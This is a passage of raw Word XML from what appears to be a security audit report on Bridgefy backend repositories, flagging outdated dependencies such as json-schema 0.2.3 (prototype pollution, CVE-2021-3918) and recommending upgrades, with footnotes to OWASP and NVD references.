      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>repositories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>components</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with publicly known vulnerabilities from underlying dependencies. While most of these weaknesses are likely not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>under</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>implementation,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>still</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>bad practice that could result in unwanted security vulnerabilities. Additionally, during the documentation review, no process was identified to automatically look for outdated dependencies. The following table summarizes the publicly known vulnerabilities affecting packages used either directly or as an underlying dependency on the affected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>repositories:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Repositories:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="6871" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-backend bridgefy-app-backend bridgefy-sdk-infra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>affecting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>underlying</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>components:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="87"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="7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020"/>
        <w:gridCol w:w="6620"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="459" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="112"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="112"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="366" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="237" w:lineRule="exact" w:before="110"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId109">
              <w:r>
                <w:rPr>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="22"/>
                </w:rPr>
                <w:t>json-schema@0.2</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="237" w:lineRule="exact" w:before="110"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>by:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Prototype</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Pollution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:position w:val="7"/>
                <w:sz w:val="11"/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="309" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="249" w:lineRule="exact"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="34"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="16"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="17"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sdk-backend/package-lock.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="302" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="15"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Affected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Code:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="340" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"json-schema"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="12"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487605248">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>105737</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="54" name="Graphic 54"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="54" name="Graphic 54"/>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8.325797pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15711232;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape41" coordorigin="1440,167" coordsize="2880,0" path="m1440,167l4320,167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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId110">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.ssllabs.com/ssltest/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>61</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId111">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-o-saft/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>62</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId112">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/.../HTTP_Strict_Transport_Security_Cheat_Sheet.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>63</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId113">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/controls/SecureFlag</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId114">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/HttpOnly</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId115">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId116">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2021-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>3918</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="7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020"/>
        <w:gridCol w:w="6620"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1019" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6620" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto" w:before="99"/>
              <w:ind w:right="3106" w:firstLine="593"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="785CA2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"version"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:b/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>0.2.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="DE4F00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Upgrade</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>jose</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
